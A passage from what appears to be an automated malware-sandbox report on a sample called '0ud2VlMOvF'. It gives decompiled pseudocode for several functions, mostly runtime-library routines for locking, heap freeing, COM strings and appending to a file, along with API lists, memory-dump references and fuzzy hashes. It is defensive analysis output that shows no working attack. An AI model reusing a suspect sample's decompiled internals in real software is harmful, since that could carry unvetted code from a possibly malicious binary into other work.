                                                                                                                              0x00429b49
                                                                                                                              0x00429b22

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __flsbuf$__flswbuf_wctomb_s
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3257920507-0
                                                                                                                              • Opcode ID: e0d86a91eab6ea459f9ee8dc64fb705ded9611c1bfa30d162f15854e3efbc3ca
                                                                                                                              • Instruction ID: 6982fdc6db965bf49ac3fb6d8e28f94b0a12b22e139b028d44a6241c0b10efda
                                                                                                                              • Opcode Fuzzy Hash: e0d86a91eab6ea459f9ee8dc64fb705ded9611c1bfa30d162f15854e3efbc3ca
                                                                                                                              • Instruction Fuzzy Hash: FA515A323046749AC7149B29B8818AA7BD4EE12334BB4164FF0A5C72D1DA3CED42C66D
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00412D70 Relevance: 7.6, APIs: 5, Instructions: 100memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 37%
                                                                                                                              			E00412D70(void* __ecx, intOrPtr* _a4) {
				signed int _v0;
				char _v12;
				intOrPtr _v16;
				char _v20;
				short _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v40;
				char _v56;
				intOrPtr* _t25;
				intOrPtr _t27;
				intOrPtr* _t30;
				intOrPtr* _t34;
				void* _t35;
				intOrPtr* _t36;
				intOrPtr _t39;
				intOrPtr* _t43;
				void* _t51;
				intOrPtr* _t52;
				intOrPtr* _t53;
				intOrPtr _t59;
				signed int _t60;
				signed int _t61;
				void* _t62;

				_t62 =  &_v16;
				_t52 = _a4;
				_t25 =  *_t52;
				_t61 = _t60 | 0xffffffff;
				_t51 = __ecx;
				if(_t25 == 0) {
					L16:
					return _t61;
				} else {
					_t27 =  *_t25;
					if(_t27 == 0) {
						goto L16;
					} else {
						__imp__#7(_t27);
						if(_t27 <= 0 || E00412B20(__ecx) < 0) {
							goto L16;
						} else {
							_v0 = _t61;
							__imp__#8( &_v20);
							_t53 =  *_t52;
							if(_t53 == 0) {
								_v16 = 0;
							} else {
								_t39 =  *_t53;
								if(_t39 == 0) {
									_t59 = 0;
									goto L9;
								} else {
									__imp__#149(_t39);
									__imp__#150( *_t53, _t39);
									_t59 = _t39;
									if(_t59 != 0) {
										L9:
										_v16 = _t59;
									} else {
										E00419B20(0x8007000e);
										_v32 = _t59;
									}
								}
							}
							_t30 =  *((intOrPtr*)(_t51 + 4));
							_v24 = 8;
							 *((intOrPtr*)( *((intOrPtr*)( *_t30 + 0xfc))))(_t30, 0);
							_t43 =  *((intOrPtr*)(_t51 + 4));
							_t34 = _t62 - 0x10;
							 *_t34 = _v32;
							 *((intOrPtr*)(_t34 + 4)) = _v28;
							 *((intOrPtr*)(_t34 + 8)) = _v24;
							 *((intOrPtr*)(_t34 + 0xc)) = _v20;
							_t35 =  *((intOrPtr*)( *((intOrPtr*)( *_t43 + 0xe8))))(_t43,  &_v12);
							__imp__#9( &_v56);
							if(_t35 < 0 || _v40 == 0) {
								_t36 =  *((intOrPtr*)(_t51 + 4));
								if(_t36 != 0) {
									 *((intOrPtr*)( *((intOrPtr*)( *_t36 + 8))))(_t36);
									 *((intOrPtr*)(_t51 + 4)) = 0;
								}
								goto L16;
							} else {
								return 0;
							}
						}
					}
				}
			}



























                                                                                                                              0x00412d70
                                                                                                                              0x00412d75
                                                                                                                              0x00412d79
                                                                                                                              0x00412d7b
                                                                                                                              0x00412d81
                                                                                                                              0x00412d83
                                                                                                                              0x00412e89
                                                                                                                              0x00412e8f
                                                                                                                              0x00412d89
                                                                                                                              0x00412d89
                                                                                                                              0x00412d8d
                                                                                                                              0x00000000
                                                                                                                              0x00412d93
                                                                                                                              0x00412d94
                                                                                                                              0x00412d9c
                                                                                                                              0x00000000
                                                                                                                              0x00412db1
                                                                                                                              0x00412db6
                                                                                                                              0x00412dba
                                                                                                                              0x00412dc0
                                                                                                                              0x00412dc4
                                                                                                                              0x00412dfb
                                                                                                                              0x00412dc6
                                                                                                                              0x00412dc6
                                                                                                                              0x00412dca
                                                                                                                              0x00412df3
                                                                                                                              0x00000000
                                                                                                                              0x00412dcc
                                                                                                                              0x00412dcd
                                                                                                                              0x00412dd7
                                                                                                                              0x00412ddd
                                                                                                                              0x00412de1
                                                                                                                              0x00412df5
                                                                                                                              0x00412df5
                                                                                                                              0x00412de3
                                                                                                                              0x00412de8
                                                                                                                              0x00412ded
                                                                                                                              0x00412ded
                                                                                                                              0x00412de1
                                                                                                                              0x00412dca
                                                                                                                              0x00412e03
                                                                                                                              0x00412e06
                                                                                                                              0x00412e18
                                                                                                                              0x00412e1e
                                                                                                                              0x00412e2b
                                                                                                                              0x00412e2d
                                                                                                                              0x00412e33
                                                                                                                              0x00412e3a
                                                                                                                              0x00412e48
                                                                                                                              0x00412e4b
                                                                                                                              0x00412e54
                                                                                                                              0x00412e5c
                                                                                                                              0x00412e71
                                                                                                                              0x00412e76
                                                                                                                              0x00412e7e
                                                                                                                              0x00412e80
                                                                                                                              0x00412e80
                                                                                                                              0x00000000
                                                                                                                              0x00412e66
                                                                                                                              0x00412e6e
                                                                                                                              0x00412e6e
                                                                                                                              0x00412e5c
                                                                                                                              0x00412d9c
                                                                                                                              0x00412d8d

                                                                                                                              APIs
                                                                                                                              • SysStringLen.OLEAUT32(?), ref: 00412D94
                                                                                                                                • Part of subcall function 00412B20: CoCreateInstance.OLE32(00433564,00000000,00000017,00433548,00000000,?,?,00412DA9,?,?,00000000,?,?,00000000,?), ref: 00412B55
                                                                                                                              • VariantInit.OLEAUT32(?), ref: 00412DBA
                                                                                                                              • SysStringByteLen.OLEAUT32(00000000), ref: 00412DCD
                                                                                                                              • SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 00412DD7
                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00412E54
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: String$ByteVariant$AllocClearCreateInitInstance
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1681070035-0
                                                                                                                              • Opcode ID: 8cc985d4201def2a8938cd6747a2ba5db60e57363f5983e54185817242cb82d6
                                                                                                                              • Instruction ID: 88f5dec265f37bdb6ec861290eba4c51801a4c029844d70e4c2105f59075bbec
                                                                                                                              • Opcode Fuzzy Hash: 8cc985d4201def2a8938cd6747a2ba5db60e57363f5983e54185817242cb82d6
                                                                                                                              • Instruction Fuzzy Hash: 483149756003119FC710DF28DA44A6AB3E8BF88714F04866EE898E7350D7B4EC55CB99
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00422732 Relevance: 7.6, APIs: 5, Instructions: 100COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 91%
                                                                                                                              			E00422732(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t39;
				intOrPtr* _t40;
				intOrPtr _t41;
				intOrPtr _t42;
				struct _CRITICAL_SECTION** _t43;
				intOrPtr _t47;
				struct _CRITICAL_SECTION* _t49;
				intOrPtr _t50;
				intOrPtr _t52;
				signed char _t54;
				intOrPtr _t56;
				intOrPtr _t58;
				struct _CRITICAL_SECTION* _t59;
				intOrPtr _t67;
				void* _t76;
				struct _CRITICAL_SECTION* _t78;
				signed int _t80;
				signed int _t81;
				void* _t82;

				_t76 = __edx;
				_push(0x10);
				_push(0x438ff8);
				E00421294(__ebx, __edi, __esi);
				_t78 = 0;
				 *(_t82 - 0x1c) = 0;
				E004240A7(1);
				 *((intOrPtr*)(_t82 - 4)) = 0;
				_t80 = 0;
				while(1) {
					 *(_t82 - 0x20) = _t80;
					if(_t80 >=  *0x43ddc0) {
						break;
					}
					_t39 =  *0x43cdbc; // 0x22720e0
					_t40 = _t39 + _t80 * 4;
					if( *_t40 == 0) {
						_t81 = _t80 << 2;
						_t41 = E0041D489(0x38);
						_t67 =  *0x43cdbc; // 0x22720e0
						 *((intOrPtr*)(_t81 + _t67)) = _t41;
						_t42 =  *0x43cdbc; // 0x22720e0
						_t43 = _t42 + _t81;
						__eflags =  *_t43;
						if(__eflags != 0) {
							_push(0xfa0);
							_push( *_t43 + 0x20);
							__eflags = E00429043(0, _t76, _t78, _t81, __eflags);
							_t47 =  *0x43cdbc; // 0x22720e0
							if(__eflags != 0) {
								_t49 =  *((intOrPtr*)(_t81 + _t47)) + 0x20;
								__eflags = _t49;
								EnterCriticalSection(_t49);
								_t50 =  *0x43cdbc; // 0x22720e0
								_t78 =  *(_t81 + _t50);
								 *(_t82 - 0x1c) = _t78;
								 *(_t78 + 0xc) = 0;
							} else {
								_push( *((intOrPtr*)(_t81 + _t47)));
								E0041BDF6(0, _t78, _t81, __eflags);
								_t52 =  *0x43cdbc; // 0x22720e0
								 *((intOrPtr*)(_t81 + _t52)) = 0;
							}
						}
						break;
					}
					_t54 =  *( *_t40 + 0xc);
					if((_t54 & 0x00000083) != 0 || _t54 < 0) {
						L9:
						_t80 = _t80 + 1;
						continue;
					} else {
						_t9 = _t80 - 3; // -3
						_t89 = _t9 - 0x10;
						if(_t9 > 0x10) {
							L7:
							_t56 =  *0x43cdbc; // 0x22720e0
							E00422418(_t80,  *((intOrPtr*)(_t56 + _t80 * 4)));
							_t58 =  *0x43cdbc; // 0x22720e0
							_t59 =  *(_t58 + _t80 * 4);
							if(( *(_t59 + 0xc) & 0x00000083) == 0) {
								_t78 = _t59;
								 *(_t82 - 0x1c) = _t78;
								break;
							} else {
								E0042247C(_t80, _t59);
								goto L9;
							}
						}
						_t10 = _t80 + 0x10; // 0x10
						if(E00423FE4(0, _t76, _t78, _t80, _t89) == 0) {
							break;
						}
						goto L7;
					}
				}
				__eflags = _t78;
				if(_t78 != 0) {
					 *(_t78 + 0xc) =  *(_t78 + 0xc) & 0x00008000;
					 *((intOrPtr*)(_t78 + 4)) = 0;
					 *((intOrPtr*)(_t78 + 8)) = 0;
					 *_t78 = 0;
					 *((intOrPtr*)(_t78 + 0x1c)) = 0;
					_t31 = _t78 + 0x10;
					 *_t31 =  *(_t78 + 0x10) | 0xffffffff;
					__eflags =  *_t31;
				}
				 *((intOrPtr*)(_t82 - 4)) = 0xfffffffe;
				E0042285F();
				return E004212D9(_t78);
			}






















                                                                                                                              0x00422732
                                                                                                                              0x00422732
                                                                                                                              0x00422734
                                                                                                                              0x00422739
                                                                                                                              0x00422740
                                                                                                                              0x00422742
                                                                                                                              0x00422747
                                                                                                                              0x0042274d
                                                                                                                              0x00422750
                                                                                                                              0x00422752
                                                                                                                              0x00422752
                                                                                                                              0x0042275b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00422761
                                                                                                                              0x00422766
                                                                                                                              0x0042276b
                                                                                                                              0x004227c6
                                                                                                                              0x004227cb
                                                                                                                              0x004227d1
                                                                                                                              0x004227d7
                                                                                                                              0x004227da
                                                                                                                              0x004227df
                                                                                                                              0x004227e1
                                                                                                                              0x004227e3
                                                                                                                              0x004227e5
                                                                                                                              0x004227ef
                                                                                                                              0x004227f7
                                                                                                                              0x004227f9
                                                                                                                              0x004227fe
                                                                                                                              0x00422816
                                                                                                                              0x00422816
                                                                                                                              0x0042281a
                                                                                                                              0x00422820
                                                                                                                              0x00422825
                                                                                                                              0x00422828
                                                                                                                              0x0042282b
                                                                                                                              0x00422800
                                                                                                                              0x00422800
                                                                                                                              0x00422803
                                                                                                                              0x00422809
                                                                                                                              0x0042280e
                                                                                                                              0x0042280e
                                                                                                                              0x004227fe
                                                                                                                              0x00000000
                                                                                                                              0x004227e3
                                                                                                                              0x0042276f
                                                                                                                              0x00422774
                                                                                                                              0x004227bc
                                                                                                                              0x004227bc
                                                                                                                              0x00000000
                                                                                                                              0x0042277b
                                                                                                                              0x0042277b
                                                                                                                              0x0042277e
                                                                                                                              0x00422781
                                                                                                                              0x00422795
                                                                                                                              0x00422795
                                                                                                                              0x0042279e
                                                                                                                              0x004227a5
                                                                                                                              0x004227aa
                                                                                                                              0x004227b1
                                                                                                                              0x004227bf
                                                                                                                              0x004227c1
                                                                                                                              0x00000000
                                                                                                                              0x004227b3
                                                                                                                              0x004227b5
                                                                                                                              0x00000000
                                                                                                                              0x004227bb
                                                                                                                              0x004227b1
                                                                                                                              0x00422783
                                                                                                                              0x0042278f
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0042278f
                                                                                                                              0x00422774
                                                                                                                              0x0042282e
                                                                                                                              0x00422830
                                                                                                                              0x00422832
                                                                                                                              0x00422839
                                                                                                                              0x0042283c
                                                                                                                              0x0042283f
                                                                                                                              0x00422841
                                                                                                                              0x00422844
                                                                                                                              0x00422844
                                                                                                                              0x00422844
                                                                                                                              0x00422844
                                                                                                                              0x00422848
                                                                                                                              0x0042284f
                                                                                                                              0x0042285b

                                                                                                                              APIs
                                                                                                                              • __lock.LIBCMT ref: 00422747
                                                                                                                                • Part of subcall function 004240A7: __mtinitlocknum.LIBCMT ref: 004240BB
                                                                                                                                • Part of subcall function 004240A7: __amsg_exit.LIBCMT ref: 004240C7
                                                                                                                                • Part of subcall function 004240A7: EnterCriticalSection.KERNEL32(?,?,?,00425EA3,00000004,00439078,0000000C,0041D4DC,0041AD79,0041AD79,00000000,00000000,00000000,004201FE,00000001,00000214), ref: 004240CF
                                                                                                                              • __mtinitlocknum.LIBCMT ref: 00422787
                                                                                                                              • __malloc_crt.LIBCMT ref: 004227CB
                                                                                                                              • ___crtInitCritSecAndSpinCount.LIBCMT ref: 004227F0
                                                                                                                              • EnterCriticalSection.KERNEL32(022720C0,00438FF8,00000010,0041BADE,00438C90,0000000C,0041BB59,00000000,00000000,00000040,004104F9,?,004333FC), ref: 0042281A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CriticalEnterSection__mtinitlocknum$CountCritInitSpin___crt__amsg_exit__lock__malloc_crt
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1486408876-0
                                                                                                                              • Opcode ID: 64d59bd344d0ba5e94335293900c76218d6222f500b736fb51cbac6c7e62c5f1
                                                                                                                              • Instruction ID: 4eb5b1987ede258f9cfa1d03f1c01c86af81f2fe460f3245c6fd75714f8651a5
                                                                                                                              • Opcode Fuzzy Hash: 64d59bd344d0ba5e94335293900c76218d6222f500b736fb51cbac6c7e62c5f1
                                                                                                                              • Instruction Fuzzy Hash: 09318236604621AFC721EF69F981A59B7F4BF49314790822FF454A72A1CBB8E841CF4C
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00414040 Relevance: 7.6, APIs: 5, Instructions: 61fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 82%
                                                                                                                              			E00414040() {
				intOrPtr _v24;
				long _v32;
				void* __ecx;
				void* _t14;
				intOrPtr _t16;
				int _t17;
				intOrPtr _t19;
				void* _t20;
				void* _t23;
				intOrPtr _t24;
				void* _t29;
				void* _t31;
				long _t33;

				_t31 = _t23;
				if( *((intOrPtr*)(_t31 + 0x18)) != 0) {
					_t33 = GetLastError();
					if( *((intOrPtr*)(_t31 + 0x1c)) < 8) {
						_t16 = _t31 + 8;
					} else {
						_t16 =  *((intOrPtr*)(_t31 + 8));
					}
					_t17 =  *0x43ba50(_t16, 0xc0000000, 1, 0, 4, 0x80, 0);
					_t29 = _t17;
					if(_t29 != 0xffffffff) {
						SetFilePointer(_t29, 0, 0, 2);
						_t19 = _v24;
						_t24 =  *((intOrPtr*)(_t19 + 0x14));
						_v32 = 0;
						if( *((intOrPtr*)(_t19 + 0x18)) < 8) {
							_t20 = _t19 + 4;
						} else {
							_t20 =  *(_t19 + 4);
						}
						WriteFile(_t29, _t20, _t24 + _t24,  &_v32, 0);
						 *((intOrPtr*)(_t31 + 0x28)) =  *((intOrPtr*)(_t31 + 0x28)) + 1;
						if( *((intOrPtr*)(_t31 + 0x28)) > 0x64) {
							E00413740(_t31, _t29);
						}
						_t17 = CloseHandle(_t29);
					}
					SetLastError(_t33);
					return _t17;
				}
				return _t14;
			}
















                                                                                                                              0x00414042
                                                                                                                              0x00414048
                                                                                                                              0x0041405a
                                                                                                                              0x0041405c
                                                                                                                              0x00414063
                                                                                                                              0x0041405e
                                                                                                                              0x0041405e
                                                                                                                              0x0041405e
                                                                                                                              0x00414079
                                                                                                                              0x0041407f
                                                                                                                              0x00414084
                                                                                                                              0x0041408d
                                                                                                                              0x00414093
                                                                                                                              0x0041409b
                                                                                                                              0x0041409e
                                                                                                                              0x004140a6
                                                                                                                              0x004140ad
                                                                                                                              0x004140a8
                                                                                                                              0x004140a8
                                                                                                                              0x004140a8
                                                                                                                              0x004140bc
                                                                                                                              0x004140c2
                                                                                                                              0x004140ca
                                                                                                                              0x004140cf
                                                                                                                              0x004140cf
                                                                                                                              0x004140d5
                                                                                                                              0x004140d5
                                                                                                                              0x004140dc
                                                                                                                              0x00000000
                                                                                                                              0x004140e3
                                                                                                                              0x004140e6

                                                                                                                              APIs
                                                                                                                              • GetLastError.KERNEL32(00000000,00000000,?,?,0041838A,?,004337EC,00000002,?,?,00433140,00000001,00000000,00000000,000000FF,?), ref: 00414050
                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041408D
                                                                                                                              • WriteFile.KERNEL32(00000000,-00000004,?,00000000,00000000), ref: 004140BC
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004140D5
                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 004140DC
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorFileLast$CloseHandlePointerWrite
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2833697291-0
                                                                                                                              • Opcode ID: 8a3059eaee2b70d3ea590af7272fbf42d9be48bac123726d4f34c7973fca0a26
                                                                                                                              • Instruction ID: 4a21eb7ebe34796e228352e7a71d343abe7a987e9b43a4fc9a6e829cd48b6667
                                                                                                                              • Opcode Fuzzy Hash: 8a3059eaee2b70d3ea590af7272fbf42d9be48bac123726d4f34c7973fca0a26
                                                                                                                              • Instruction Fuzzy Hash: 5A11A771200300AFD2289B15DC4DFAB77B9EB85715F11452EF306A65E0C7B4E889CB6D
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041BDF6 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 39%
                                                                                                                              			E0041BDF6(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t25;

				_push(0xc);
				_push(0x438cb0);
				_t8 = E00421294(__ebx, __edi, __esi);
				_t23 =  *((intOrPtr*)(_t25 + 8));
				if(_t23 == 0) {
					L9:
					return E004212D9(_t8);
				}
				if( *0x43cdb8 != 3) {
					_push(_t23);
					L7:
					_t8 = HeapFree( *0x43c844, 0, ??);
					_t31 = _t8;
					if(_t8 == 0) {
						_t10 = E0041B805(_t31);
						 *_t10 = E0041B7CA(GetLastError());
					}
					goto L9;
				}
				E004240A7(4);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t13 = E00424120(_t23);
				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t23);
					_push(_t13);
					E0042414B();
				}
				 *(_t25 - 4) = 0xfffffffe;
				_t8 = E0041BE4C();
				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t25 + 8)));
					goto L7;
				}
			}







                                                                                                                              0x0041bdf6
                                                                                                                              0x0041bdf8
                                                                                                                              0x0041bdfd
                                                                                                                              0x0041be02
                                                                                                                              0x0041be07
                                                                                                                              0x0041be7e
                                                                                                                              0x0041be83
                                                                                                                              0x0041be83
                                                                                                                              0x0041be10
                                                                                                                              0x0041be55
                                                                                                                              0x0041be56
                                                                                                                              0x0041be5e
                                                                                                                              0x0041be64
                                                                                                                              0x0041be66
                                                                                                                              0x0041be68
                                                                                                                              0x0041be7b
                                                                                                                              0x0041be7d
                                                                                                                              0x00000000
                                                                                                                              0x0041be66
                                                                                                                              0x0041be14
                                                                                                                              0x0041be1a
                                                                                                                              0x0041be1f
                                                                                                                              0x0041be25
                                                                                                                              0x0041be2a
                                                                                                                              0x0041be2c
                                                                                                                              0x0041be2d
                                                                                                                              0x0041be2e
                                                                                                                              0x0041be34
                                                                                                                              0x0041be35
                                                                                                                              0x0041be3c
                                                                                                                              0x0041be45
                                                                                                                              0x00000000
                                                                                                                              0x0041be47
                                                                                                                              0x0041be47
                                                                                                                              0x00000000
                                                                                                                              0x0041be47

                                                                                                                              APIs
                                                                                                                              • __lock.LIBCMT ref: 0041BE14
                                                                                                                                • Part of subcall function 004240A7: __mtinitlocknum.LIBCMT ref: 004240BB
                                                                                                                                • Part of subcall function 004240A7: __amsg_exit.LIBCMT ref: 004240C7
                                                                                                                                • Part of subcall function 004240A7: EnterCriticalSection.KERNEL32(?,?,?,00425EA3,00000004,00439078,0000000C,0041D4DC,0041AD79,0041AD79,00000000,00000000,00000000,004201FE,00000001,00000214), ref: 004240CF
                                                                                                                              • ___sbh_find_block.LIBCMT ref: 0041BE1F
                                                                                                                              • ___sbh_free_block.LIBCMT ref: 0041BE2E
                                                                                                                              • HeapFree.KERNEL32(00000000,0041AD79,00438CB0,0000000C,00424088,00000000,00439018,0000000C,004240C0,0041AD79,?,?,00425EA3,00000004,00439078,0000000C), ref: 0041BE5E
                                                                                                                              • GetLastError.KERNEL32(?,00425EA3,00000004,00439078,0000000C,0041D4DC,0041AD79,0041AD79,00000000,00000000,00000000,004201FE,00000001,00000214,?,00000000), ref: 0041BE6F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2714421763-0
                                                                                                                              • Opcode ID: 12e860a472f26724852a07a38102bfa61a205cccc466906b44ece69f1dc0ea26
                                                                                                                              • Instruction ID: c81a27cd5baf289482d53e8a5ca2116f4810300b6d0c34b4db01f9288b6df06d
                                                                                                                              • Opcode Fuzzy Hash: 12e860a472f26724852a07a38102bfa61a205cccc466906b44ece69f1dc0ea26
                                                                                                                              • Instruction Fuzzy Hash: 96012131901311EADB206FB2A90A7DF3BA4DF50755F20511FF600A6191DB3C85808AAC
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 009762E9 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • _free.LIBCMT ref: 00976301
                                                                                                                                • Part of subcall function 00975822: RtlFreeHeap.NTDLL(00000000,00000000,?,00976460,?,00000000,?,?,?,0097636B,?,00000007,?,?,00976BE8,?), ref: 00975838
                                                                                                                                • Part of subcall function 00975822: GetLastError.KERNEL32(?,?,00976460,?,00000000,?,?,?,0097636B,?,00000007,?,?,00976BE8,?,?), ref: 0097584A
                                                                                                                              • _free.LIBCMT ref: 00976313
                                                                                                                              • _free.LIBCMT ref: 00976325
                                                                                                                              • _free.LIBCMT ref: 00976337
                                                                                                                              • _free.LIBCMT ref: 00976349
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 776569668-0
                                                                                                                              • Opcode ID: 6c4f856285bbb34e674a2eeac0d2187e0cfd4340c2dc2826f6e9efae48a4b0e5
                                                                                                                              • Instruction ID: f7d95a0b342cb8eeabb7fa29b4f2adb4a1962f89e327b4316c258846c3c3a1a5
                                                                                                                              • Opcode Fuzzy Hash: 6c4f856285bbb34e674a2eeac0d2187e0cfd4340c2dc2826f6e9efae48a4b0e5
                                                                                                                              • Instruction Fuzzy Hash: 5AF09033608A00ABC660EB68F8C2C5A7BEDEE40720769C819F00DD7600CB31FC80CBA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0096A970 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 399COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 1~D$1~D
                                                                                                                              • API String ID: 0-3684551642
                                                                                                                              • Opcode ID: 4cfc0e13356c946bb7b0db18d82a7dc1d4c813836fbec3df5d9a650d202e7b48
                                                                                                                              • Instruction ID: 37049cacd8bb18cfdaab52b130a7f6f7687579c8a2868428950d590f066cbfd0
                                                                                                                              • Opcode Fuzzy Hash: 4cfc0e13356c946bb7b0db18d82a7dc1d4c813836fbec3df5d9a650d202e7b48
                                                                                                                              • Instruction Fuzzy Hash: FEE158316042058BCF288A6896D526D37BABF55361F754A37E052FB3A1D32ACC81DF83
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040C5D0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 200windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
